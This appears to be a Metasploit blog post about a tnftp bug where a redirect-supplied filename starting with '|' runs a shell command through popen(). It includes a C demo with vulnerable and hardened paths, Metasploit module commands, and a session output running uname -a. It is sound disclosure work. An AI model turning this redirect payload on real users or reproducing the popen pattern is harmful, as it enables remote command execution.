This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements and events in the Metasploit Framework over the course of 2014.
It's been quite a year for shell bugs. Of course, we all know about Shellshock, the tragic bash bug that made the major media news. Most of us heard about the vulnerabilities in the command line tools wget, curl, and git (more on that last one later on during HaXmas). But did you notice the FTP command bug, the one that remains unpatched today on a fairly popular operating system? Read on...
popen()'ing an RCE present
The bug is rather simple, as explained (somewhat verbosely) by the description in the Metasploit module:
This module exploits an arbitrary command execution vulnerability in tnftp's handling of the resolved output filename - called "savefile" in the source - from a requested resource.
If tnftp is executed without the -o command-line option, it will resolve the output filename from the last component of the requested resource.
If the output filename begins with a "|" character, tnftp will pass the fetched resource's output to the command directly following the "|" character through the use of the popen() function.
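To make that description concrete, here is a small C program written for this write-up (it is not tnftp's source and not the Metasploit module) that mirrors the behaviour just described: it derives the savefile from the last path component of a URL, percent-decodes it, and shows the vulnerable popen() branch next to a hardened check that refuses a name beginning with "|". The host attacker.test, the function names and the extra rejections in the hardened check (path separators, "." and "..") are my own choices; the percent-encoded path is the one the module's redirect produces in the session later in this post.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static const char HEX[] = "0123456789abcdef";

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(int c)
{
    const char *p = (c != '\0') ? strchr(HEX, tolower((unsigned char)c)) : NULL;
    return p ? (int)(p - HEX) : -1;
}

/* Percent-decode src into dst; dst needs strlen(src) + 1 bytes. */
static void url_decode(const char *src, char *dst)
{
    while (*src != '\0') {
        if (*src == '%' && hexval(src[1]) >= 0 && hexval(src[2]) >= 0) {
            *dst++ = (char)(hexval(src[1]) * 16 + hexval(src[2]));
            src += 3;
        } else {
            *dst++ = *src++;
        }
    }
    *dst = '\0';
}

/* Percent-encode every byte of s, the way the redirect target in the post
 * is encoded ("|uname -a" -> "%7c%75%6e%61%6d%65%20%2d%61").
 * dst needs 3 * strlen(s) + 1 bytes. */
static void url_encode_all(const char *s, char *dst)
{
    for (; *s != '\0'; s++) {
        unsigned char c = (unsigned char)*s;
        *dst++ = '%';
        *dst++ = HEX[c >> 4];
        *dst++ = HEX[c & 0x0f];
    }
    *dst = '\0';
}

/* Derive the output filename the way the description says tnftp does when
 * -o is absent: the last component of the URL path, percent-decoded.
 * Returns 0 and fills out on success, -1 if there is no usable component. */
static int resolve_savefile(const char *url, char *out, size_t outlen)
{
    char enc[512];
    const char *p = strstr(url, "://");
    const char *path, *last;
    size_t len;

    p = (p != NULL) ? p + 3 : url;       /* skip "scheme://" */
    path = strchr(p, '/');               /* first '/' after host[:port] */
    if (path == NULL)
        return -1;
    last = strrchr(path, '/') + 1;       /* last path component */
    len = strcspn(last, "?#");           /* drop query string / fragment */
    if (len == 0 || len >= sizeof enc || len >= outlen)
        return -1;
    memcpy(enc, last, len);
    enc[len] = '\0';
    url_decode(enc, out);                /* decoding never lengthens the string */
    return 0;
}

/* The vulnerable pattern: a savefile whose first byte is '|' is handed to
 * popen(), so the "filename" taken from the URL becomes a shell command. */
static FILE *open_savefile_vulnerable(const char *savefile)
{
    if (savefile[0] == '|')
        return popen(savefile + 1, "w");
    return fopen(savefile, "w");
}

/* Hardened check for a name that came off the network: refuse the pipe
 * prefix, and (my addition) path separators and the "." / ".." names.
 * Returns 1 if the name may be opened as a plain file. */
static int savefile_is_safe(const char *savefile)
{
    return savefile[0] != '\0' && savefile[0] != '|' &&
           strchr(savefile, '/') == NULL &&
           strcmp(savefile, ".") != 0 && strcmp(savefile, "..") != 0;
}

int main(int argc, char **argv)
{
    /* Constructed sample (made-up host): the redirect target from the
     * session in the post. Pass --vulnerable to take the popen() path. */
    const char *url = "http://attacker.test/%7c%75%6e%61%6d%65%20%2d%61";
    int vulnerable = argc > 1 && strcmp(argv[1], "--vulnerable") == 0;
    char savefile[512];
    FILE *fp;

    if (resolve_savefile(url, savefile, sizeof savefile) != 0)
        return 1;
    printf("savefile resolved to: %s\n", savefile);
    if (!vulnerable && !savefile_is_safe(savefile)) {
        printf("hardened client: refusing to open it\n");
        return 1;
    }
    fp = open_savefile_vulnerable(savefile);   /* with '|': runs uname -a */
    if (fp == NULL)
        return 1;
    return savefile[0] == '|' ? pclose(fp) : fclose(fp);
}
```

Run it as is and the hardened check refuses the name; run it with --vulnerable and popen() executes uname -a exactly as the Yosemite session below shows. The point to take away is that the decision is made on the filename alone, before a single byte of the resource has been fetched, so the "download" is irrelevant to the command execution.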
Okay, so how do we use this thing?
We can use Metasploit! Using auxiliary/server/tnftp_savefile is pretty easy:
msf > use auxiliary/server/tnftp_savefile
msf auxiliary(tnftp_savefile) > set uripath /
uripath => /
msf auxiliary(tnftp_savefile) > set urihost [redacted]
urihost => [redacted]
msf auxiliary(tnftp_savefile) > set uriport 80
uriport => 80
msf auxiliary(tnftp_savefile) > run
[*] Auxiliary module execution completed
msf auxiliary(tnftp_savefile) >
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://10.6.0.59:8080/
[*] Server started.
Don't worry about the URIHOST and URIPORT advanced options unless you're working through a tunnel; they only control the host and port advertised in the redirect, so they need to be whatever the victim can reach. Just set URIPATH to / to allow any URL to redirect to the exploit.
Triggering the vulnerability
Here we are triggering the vuln on a fully patched OS X Yosemite system. Note that no -o option is given, so the savefile is taken from the URL:
wvu@hiigara:~$ ftp http://[redacted]/index.html
Requesting http://[redacted]/index.html
Redirected to http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61
Requesting http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61
     0        0.00 KiB/s
Darwin hiigara 14.0.0 Darwin Kernel Version 14.0.0: Fri Sep 19 00:26:44 PDT 2014; root:xnu-2782.1.97~2/RELEASE_X86_64 x86_64
     0        0.00 KiB/s
wvu@hiigara:~$
Thanks to the redirect, we can hide the true purpose of our URL until it's too late: the victim types an innocuous-looking index.html, but the last path component of the redirect target, %7c%75%6e%61%6d%65%20%2d%61, decodes to |uname -a, and tnftp adopts that as the savefile.
Back in msfconsole, we can see the results of our attack:
[*] 10.6.0.59 tnftp_savefile - tnftp/20070806 connected
[*] 10.6.0.59 tnftp_savefile - Redirecting to exploit...
[+] 10.6.0.59 tnftp_savefile - Executing `uname -a'!
That's really all there is to it! Happy hacking!